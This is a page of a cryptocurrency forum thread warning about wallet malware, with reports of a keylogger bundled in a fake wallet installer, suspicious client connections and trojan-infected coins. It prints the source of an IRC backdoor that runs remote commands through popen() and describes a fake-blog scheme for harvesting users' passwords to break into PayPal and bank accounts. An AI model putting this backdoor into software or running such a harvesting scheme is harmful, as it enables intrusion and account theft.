Pages:
Author

Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 43. (Read 860606 times)

hero member
Activity: 868
Merit: 503
the simplest malware is a website

i have never done it, but known people that have and it is so simple and never catches a single eye

you download and install wordpress and set up a good strong blog, set up a free user based subscription and that is it

most computer/internet users have 1-5 email addresses and two of those are used more than the rest

most users have three main passwords and two others

passwords vary by user based on the three security password configs, any number letter combo six keys or more, must have a letter and a number and the last that adds the special character requirement

for example, depending on the website requirements a normal user may have these three main passwords

password
password123
password123$

when they sign up for your blog, they are likely using their secondary/spam catch email and one of those main passwords

when they signed up for a bank account, paypal or another main service, they used their main email and one of those passwords

a word press site that requires a special character, number and text has just about gotten all three passwords by simply working backwards, don't spam the subscribers and ask them for a second recovery email account after thirty days and you will have the primary email, probably, if not, that is a pretty easy find on the internet

no viruses, no Trojans or keyloggers, just human nature and the inability to remember too many damned passwords

i have know developers to take it one step further and modify the sign up process, the signup would keep telling the person that the email was already in use three times and get three email addresses and then the password setup script was modified to be a real pain and say no to the simple password, asking for a capital and number, then after that password, add the special character request and boom, three main passwords and three email addresses, worse case scenario, the person gets frustrated and leaves the site

too much of a pain for me and just sooooooo wrong, but one of our past IT guys did it over and over, the hardest part was actually developing a strong and good blog that made people want to sign up, with traffic at 500 plus per day, that means around 20 new signups each day, he collected them but never did anything, just as a case in point, after two years he had around 18,000 user profiles, he spot checked more than fifty and was in their paypal within three minutes, used that to see their bank accounts and in those accounts in another three minutes with about a 87% sucess rate

remember when you sign up on a new site or app, you are giving that info to whoever made(or even copied) the site and i personally have both spam emails catcher and a full set of spam passwords that i use on new sites, plus my credit cards can all produce a virtual number from their site for use on unknown websites that will disappear after one use or a given amount of money spent, you almost need to be three people, the businessman, the social magnet, and then guy who hands out info to any site that so much as looks interesting, lol
newbie
Activity: 1
Merit: 0
A very useful warning, People should be careful while using macros. I think people usually get attracted over using specific bots or these type of macros and get scammed.
sr. member
Activity: 412
Merit: 250
Yes... we should really be very attentive to malware infections. The last infection attempt I found was through an email. This email seemed to come from the Dropbox team, but it wasn't. If any of you received such an email you should delete it immediatelly.
newbie
Activity: 2
Merit: 0
Thanks, well that means I'm gonna use the .org installation then. Thanks 4 the info groggin.
legendary
Activity: 1894
Merit: 1001

 never had a problem w/litecoin.org, ya gotta watch that - congrats on killing it!
newbie
Activity: 2
Merit: 0
Good day guys, just wanna ask if there are other people in here that facing the same issue that I have encountered. I just downloaded litecoin wallet for windows from litecoin.com, yes, it's litecoin.com not litecoin.org. And after I install it on my pc, suddenly on the folder where I put the litecoin wallet installer adds 2 files, 1 is a batch file, the other is..... well.... I don't know what the heck is the other file.

So, after the installation successful, I tried to delete the installation files, which.... it can't, same ol' being used by the system warning excuse, while the installation process has finished. So I start the task manager, and found that there is one file that doesn't have an explanation of what file that is on the right panel, so.... open file location which leads to a folder named dclogs.... curious.... so I try to open it then wow.... only a few minutes and it has already written down 3 of my browsing activities (I noticed from the creation date of the files inside the dclogs folder). google it..... and I came to know that it was a some kind of a keylogger.... hmmm.... bummer but I'm quite lucky.....

My question is, does it even possible that the installation file from litecoin.com contains this keylogger? And I'm a bit hesitant to download from litecoin.org. Does this issue ever happen to someone in here? Are litecoin.com and litecoin.org are in the same team? I would be appreciate if someone could give me (a newbie) an info on this matter, and thanks  Grin .
legendary
Activity: 1806
Merit: 1164
Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+

There are clever hacks for a trezor as well, nothing is 100% safe so don't get lulled into a false sense of security. See: http://www.hackinsight.org/news,303.html

Granted, that is a particular version of firmware but as wih any device that stores "money" there will always be people looking for the loopholes. A dedicated attacker only needs a small window of time to make your funds vanish.

Pretty old news. The hack that Jochen Hoenicke found for Trezor was disabled when Trezor started enforcing PINs on firmware 1.3.3. Using a Trezor with PIN and passphrase enabled is about as safe as it gets for storing your bitcoin.

There is malware that can steal bitcoin from password protected local wallets. Coinbitclip is one example and there are more.
newbie
Activity: 43
Merit: 0
Another pretty save and easy to use program is Deep Freeze.
You can freeze your Windows partition and as soon as you reboot, your pc will go to the state you made when you "freeze" it.
This way no viruses,keyloger,trojans,rats and etc can infect you (as soon as you reboot, the bad staff is gone).
Downside is that you will have to put the block-chain of any coins you use on the second partition of your harddrive (because you will not be able to update the wallet on the windows partition).


+10 for Deep Freeze, thanks!! check out spyshelter also good protection against keyloggers, and such.  
hero member
Activity: 1008
Merit: 1012
I have encountered this such problem in the past. I have since stopped using bitcoin core as a wallet and not had a wallet that you need to download to your computer to use it since I find it annoying to have to download the blockchain every time you log into the program. Not to mention it eats up alot of my bandwidth that I seem to be running out of when the end of the month approaches.
member
Activity: 478
Merit: 66
Interesting... This is the reason why I don't dabble too much in AltCoins that seem fishy or have a very low/unknown value.
hero member
Activity: 952
Merit: 500
WARNING !! This client is making outbound connections to known malware and/or phishing sites.


http://www.urlquery.net/report.php?id=1434020970582

The "Recent reports on same IP/ASN/Domain" section shows other suspicious sites/links.
https://www.virustotal.com/en/url/946ac3207509fb493eaf2e02e107b97cc03513cb373bb007a8a61b9b6b0fe61c/analysis/1434120962/

Now lets see what the debug.log has to say...
Code:
2015-06-12 12:41:10 connection timeout
2015-06-12 12:41:11 trying connection 77.249.89.46:9748 lastseen=1802.3hrs
2015-06-12 12:41:16 connection timeout
2015-06-12 12:41:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:41:22 connection timeout
2015-06-12 12:41:22 trying connection 82.238.124.41:9748 lastseen=33.6hrs
2015-06-12 12:41:27 connection timeout
2015-06-12 12:41:28 trying connection 77.85.35.151:9748 lastseen=170.7hrs
2015-06-12 12:41:33 connection timeout
2015-06-12 12:41:33 trying connection 137.135.57.119:9748 lastseen=27.6hrs
2015-06-12 12:41:38 connection timeout
2015-06-12 12:41:39 trying connection 96.54.4.190:9748 lastseen=21.7hrs
2015-06-12 12:41:44 connection timeout
2015-06-12 12:41:44 trying connection 87.154.210.76:9748 lastseen=378.8hrs
2015-06-12 12:41:49 connection timeout
2015-06-12 12:41:50 trying connection 103.230.107.12:9748 lastseen=2166.3hrs
2015-06-12 12:41:55 connection timeout
2015-06-12 12:41:55 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:00 connection timeout
2015-06-12 12:42:01 trying connection 62.157.39.12:9748 lastseen=2675.3hrs
2015-06-12 12:42:06 connection timeout
2015-06-12 12:42:06 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:11 connection timeout
2015-06-12 12:42:12 trying connection 162.255.117.105:9748 lastseen=52.5hrs
2015-06-12 12:42:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:22 connection timeout
2015-06-12 12:42:23 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:28 connection timeout
2015-06-12 12:42:28 trying connection 5.139.143.81:9748 lastseen=3461.6hrs
2015-06-12 12:42:33 connection timeout
2015-06-12 12:42:34 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:39 connection timeout
2015-06-12 12:42:39 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:44 connection timeout
2015-06-12 12:42:45 trying connection 87.154.214.25:9748 lastseen=2063.7hrs
2015-06-12 12:42:50 connection timeout
************************************************************
2015-06-12 12:42:50 trying connection 104.219.250.234:9748 lastseen=7.2hrs**
************************************************************
2015-06-12 12:42:55 connection timeout
2015-06-12 12:42:56 trying connection 80.57.229.215:9748 lastseen=115.2hrs
2015-06-12 12:43:01 connection timeout
2015-06-12 12:43:01 trying connection 77.232.5.253:9748 lastseen=1191.0hrs

Report for the address, 104.xxx.xxx.234, :
http://www.urlquery.net/report.php?id=1434121818636

And one of it's suspicious links/sites :
https://www.virustotal.com/en/url/3b1a7af045bdc8005e8243f65d203df04ba8d43f9e10fd39af1004aad75da0ed/analysis/1434122387/

Then from this screenshot lookS like Geocoin (and then all his clone) have malicious code in it...or I'm wrong?
What can we do to inspect the source of coins looking for malicious code and prevent this kind of things?
legendary
Activity: 1624
Merit: 1001
All cryptos are FIAT digital currency. Do not use.
But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

Apparently not Cryptsy. They lost 13,000 BTC and 300,000 LTC because of the Lucky7Coin trojan.

That what you see there is a red herring. Wink
https://en.wikipedia.org/wiki/Red_herring

https://bitcointalksearch.org/topic/m.13729914
copper member
Activity: 2856
Merit: 3071
https://bit.ly/387FXHi lightning theory
There was apparently a coin that had a malicious virus in its client software.
It was AvatarCoin and the wallet tried to duplicate the .dat wallet files onto the scammers Server so that he could take all of the coins from them wallets and sell them.

The avatarcoin scam, even included an avatar campaign of 8000AV to every user who joined the campaign and stopped paying around January 8th.
full member
Activity: 224
Merit: 100
This user is currently ignored.
But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

Apparently not Cryptsy. They lost 13,000 BTC and 300,000 LTC because of the Lucky7Coin trojan.
legendary
Activity: 2940
Merit: 1333
And this is what allegedly brings down Cryptsy...

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

[...]

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?
legendary
Activity: 1330
Merit: 1000
Blockchain Developer
And this is what allegedly brings down Cryptsy...
legendary
Activity: 1064
Merit: 1000
Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+

There are clever hacks for a trezor as well, nothing is 100% safe so don't get lulled into a false sense of security. See: http://www.hackinsight.org/news,303.html

Granted, that is a particular version of firmware but as wih any device that stores "money" there will always be people looking for the loopholes. A dedicated attacker only needs a small window of time to make your funds vanish.
legendary
Activity: 1008
Merit: 1000
★YoBit.Net★ 350+ Coins Exchange & Dice
I found this today. Post has since been removed but I managed to screenshot it beforehand and also left negative feedback. A link to the virus total results is included in the feedback.




It wasn't especially sophisticated, nor was it crypted just a basic wallet stealing code that scans PC for private keys. Seems to be targeted at noobs that would get greedy and download without thinking.

off topic slightly but You dont happen to know the name of a program i can use that will scan all my hard disk drives for wallets do you? Would be handy if it also finds dash wallets because ive got at least 1 wallet on my hdd somewhere that ive completely lost.
legendary
Activity: 1806
Merit: 1164
Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+
legendary
Activity: 1064
Merit: 1000
I found this today. Post has since been removed but I managed to screenshot it beforehand and also left negative feedback. A link to the virus total results is included in the feedback.




It wasn't especially sophisticated, nor was it crypted just a basic wallet stealing code that scans PC for private keys. Seems to be targeted at noobs that would get greedy and download without thinking.
Pages:
Jump to: